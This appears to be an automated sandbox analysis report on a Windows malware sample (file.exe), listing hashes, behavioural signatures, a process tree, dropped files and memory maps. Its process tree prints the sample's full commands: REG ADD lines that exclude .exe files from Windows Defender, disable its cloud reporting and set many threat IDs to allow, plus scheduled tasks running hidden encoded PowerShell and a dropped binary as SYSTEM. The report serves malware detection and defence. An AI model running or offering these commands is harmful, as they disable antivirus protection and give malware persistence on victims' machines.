Analysis
-
max time kernel
154s -
max time network
54s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
03-10-2022 03:18
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
39e04a79618a8124f50e36a9da48b0ae
-
SHA1
f4af312ff672e5dbb48fba0f0da43e834c056a23
-
SHA256
91f46858f0c0c41956f3a32bd9431d4870c971a0046341c637e5fb66ba2225d6
-
SHA512
c1b524fb9ea93249102e2a519e5fddb5a891edef37a3bc6a753ae4638fd195d021ef6aa44f9d99e7c7ea13bbbf32cc410a6a12298082a57199bcd69ebcfca2a1
-
SSDEEP
196608:91O15kTwkxlP3zqeWrQMOJXwqUUtzBvwLsKtSUi:3O15Gwkfqe17rUUtlvZKt5i
Malware Config
Signatures
-
Executes dropped EXE 3 IoCs
Processes:
Install.exeInstall.exelxAnxCX.exepid process 1728 Install.exe 4800 Install.exe 3088 lxAnxCX.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Install.exe -
Drops file in System32 directory 1 IoCs
Processes:
Install.exedescription ioc process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Windows\Tasks\bGZpGlqvDNKjraWjlZ.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Install.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 41 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.EXEpowershell.exepid process 4912 powershell.EXE 4912 powershell.EXE 4232 powershell.exe 4232 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.EXEpowershell.exedescription pid process Token: SeDebugPrivilege 4912 powershell.EXE Token: SeDebugPrivilege 4232 powershell.exe -
Suspicious use of WriteProcessMemory 47 IoCs
Processes:
file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exepowershell.EXElxAnxCX.exedescription pid process target process PID 1936 wrote to memory of 1728 1936 file.exe Install.exe PID 1936 wrote to memory of 1728 1936 file.exe Install.exe PID 1936 wrote to memory of 1728 1936 file.exe Install.exe PID 1728 wrote to memory of 4800 1728 Install.exe Install.exe PID 1728 wrote to memory of 4800 1728 Install.exe Install.exe PID 1728 wrote to memory of 4800 1728 Install.exe Install.exe PID 4800 wrote to memory of 4956 4800 Install.exe forfiles.exe PID 4800 wrote to memory of 4956 4800 Install.exe forfiles.exe PID 4800 wrote to memory of 4956 4800 Install.exe forfiles.exe PID 4800 wrote to memory of 3128 4800 Install.exe forfiles.exe PID 4800 wrote to memory of 3128 4800 Install.exe forfiles.exe PID 4800 wrote to memory of 3128 4800 Install.exe forfiles.exe PID 4956 wrote to memory of 2976 4956 forfiles.exe cmd.exe PID 3128 wrote to memory of 3296 3128 forfiles.exe cmd.exe PID 4956 wrote to memory of 2976 4956 forfiles.exe cmd.exe PID 4956 wrote to memory of 2976 4956 forfiles.exe cmd.exe PID 3128 wrote to memory of 3296 3128 forfiles.exe cmd.exe PID 3128 wrote to memory of 3296 3128 forfiles.exe cmd.exe PID 3296 wrote to memory of 3424 3296 cmd.exe reg.exe PID 3296 wrote to memory of 3424 3296 cmd.exe reg.exe PID 3296 wrote to memory of 3424 3296 cmd.exe reg.exe PID 2976 wrote to memory of 4496 2976 cmd.exe reg.exe PID 2976 wrote to memory of 4496 2976 cmd.exe reg.exe PID 2976 wrote to memory of 4496 2976 cmd.exe reg.exe PID 2976 wrote to memory of 1420 2976 cmd.exe reg.exe PID 2976 wrote to memory of 1420 2976 cmd.exe reg.exe PID 2976 wrote to memory of 1420 2976 cmd.exe reg.exe PID 3296 wrote to memory of 4888 3296 cmd.exe reg.exe PID 3296 wrote to memory of 4888 3296 cmd.exe reg.exe PID 3296 wrote to memory of 4888 3296 cmd.exe reg.exe PID 4800 wrote to memory of 4260 4800 Install.exe schtasks.exe PID 4800 wrote to memory of 4260 4800 Install.exe schtasks.exe PID 4800 wrote to memory of 4260 4800 Install.exe schtasks.exe PID 4800 wrote to memory of 4312 4800 Install.exe schtasks.exe PID 4800 wrote to memory of 4312 4800 Install.exe schtasks.exe PID 4800 wrote to memory of 4312 4800 Install.exe schtasks.exe PID 4912 wrote to memory of 588 4912 powershell.EXE gpupdate.exe PID 4912 wrote to memory of 588 4912 powershell.EXE gpupdate.exe PID 4800 wrote to memory of 4404 4800 Install.exe schtasks.exe PID 4800 wrote to memory of 4404 4800 Install.exe schtasks.exe PID 4800 wrote to memory of 4404 4800 Install.exe schtasks.exe PID 4800 wrote to memory of 612 4800 Install.exe schtasks.exe PID 4800 wrote to memory of 612 4800 Install.exe schtasks.exe PID 4800 wrote to memory of 612 4800 Install.exe schtasks.exe PID 3088 wrote to memory of 4232 3088 lxAnxCX.exe powershell.exe PID 3088 wrote to memory of 4232 3088 lxAnxCX.exe powershell.exe PID 3088 wrote to memory of 4232 3088 lxAnxCX.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSFBBA.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS3C9.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxBvHkGXQ" /SC once /ST 01:22:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gxBvHkGXQ"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxBvHkGXQ"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 05:20:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\lxAnxCX.exe\" d8 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\lxAnxCX.exeC:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\lxAnxCX.exe d8 /site_id 525403 /S1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7zS3C9.tmp\Install.exeFilesize
6.8MB
MD56f52a47480dae7c97a64dd5aebb8e426
SHA1204fe492e1cdeacea89a4f3b2cf41626053bc992
SHA256a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879
SHA512994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c
-
C:\Users\Admin\AppData\Local\Temp\7zS3C9.tmp\Install.exeFilesize
6.8MB
MD56f52a47480dae7c97a64dd5aebb8e426
SHA1204fe492e1cdeacea89a4f3b2cf41626053bc992
SHA256a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879
SHA512994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c
-
C:\Users\Admin\AppData\Local\Temp\7zSFBBA.tmp\Install.exeFilesize
6.2MB
MD560e1b9be0cc604e0527ac0523e689150
SHA14a0ac355d6c7bb4f41631b7bef01879672b17330
SHA2560529307a084043c429ac53b20f309868bcdd24a08b006af2df20cf45d115986f
SHA5121cde30f820979d6d72ca23c6afb54aabc57a082e2146607053d88e0a01cf5fceb9f782abeb879170ccba06fbf90105828702332f962032ab454b23165df42e71
-
C:\Users\Admin\AppData\Local\Temp\7zSFBBA.tmp\Install.exeFilesize
6.2MB
MD560e1b9be0cc604e0527ac0523e689150
SHA14a0ac355d6c7bb4f41631b7bef01879672b17330
SHA2560529307a084043c429ac53b20f309868bcdd24a08b006af2df20cf45d115986f
SHA5121cde30f820979d6d72ca23c6afb54aabc57a082e2146607053d88e0a01cf5fceb9f782abeb879170ccba06fbf90105828702332f962032ab454b23165df42e71
-
C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\lxAnxCX.exeFilesize
6.8MB
MD56f52a47480dae7c97a64dd5aebb8e426
SHA1204fe492e1cdeacea89a4f3b2cf41626053bc992
SHA256a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879
SHA512994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c
-
C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\lxAnxCX.exeFilesize
6.8MB
MD56f52a47480dae7c97a64dd5aebb8e426
SHA1204fe492e1cdeacea89a4f3b2cf41626053bc992
SHA256a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879
SHA512994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c
-
memory/588-153-0x0000000000000000-mapping.dmp
-
memory/612-156-0x0000000000000000-mapping.dmp
-
memory/1420-147-0x0000000000000000-mapping.dmp
-
memory/1728-132-0x0000000000000000-mapping.dmp
-
memory/2976-143-0x0000000000000000-mapping.dmp
-
memory/3088-159-0x0000000010000000-0x0000000010B5F000-memory.dmpFilesize
11.4MB
-
memory/3128-142-0x0000000000000000-mapping.dmp
-
memory/3296-144-0x0000000000000000-mapping.dmp
-
memory/3424-145-0x0000000000000000-mapping.dmp
-
memory/4232-162-0x0000000000000000-mapping.dmp
-
memory/4232-164-0x0000000003B40000-0x0000000004168000-memory.dmpFilesize
6.2MB
-
memory/4232-168-0x0000000004A50000-0x0000000004A6E000-memory.dmpFilesize
120KB
-
memory/4232-163-0x00000000034D0000-0x0000000003506000-memory.dmpFilesize
216KB
-
memory/4232-167-0x00000000042E0000-0x0000000004346000-memory.dmpFilesize
408KB
-
memory/4232-165-0x0000000003A50000-0x0000000003A72000-memory.dmpFilesize
136KB
-
memory/4232-166-0x0000000004270000-0x00000000042D6000-memory.dmpFilesize
408KB
-
memory/4260-149-0x0000000000000000-mapping.dmp
-
memory/4312-150-0x0000000000000000-mapping.dmp
-
memory/4404-155-0x0000000000000000-mapping.dmp
-
memory/4496-146-0x0000000000000000-mapping.dmp
-
memory/4800-135-0x0000000000000000-mapping.dmp
-
memory/4800-138-0x0000000010000000-0x0000000010B5F000-memory.dmpFilesize
11.4MB
-
memory/4888-148-0x0000000000000000-mapping.dmp
-
memory/4912-152-0x000001A3FBD40000-0x000001A3FBD62000-memory.dmpFilesize
136KB
-
memory/4912-154-0x00007FFD6C7C0000-0x00007FFD6D281000-memory.dmpFilesize
10.8MB
-
memory/4912-151-0x00007FFD6C7C0000-0x00007FFD6D281000-memory.dmpFilesize
10.8MB
-
memory/4956-141-0x0000000000000000-mapping.dmp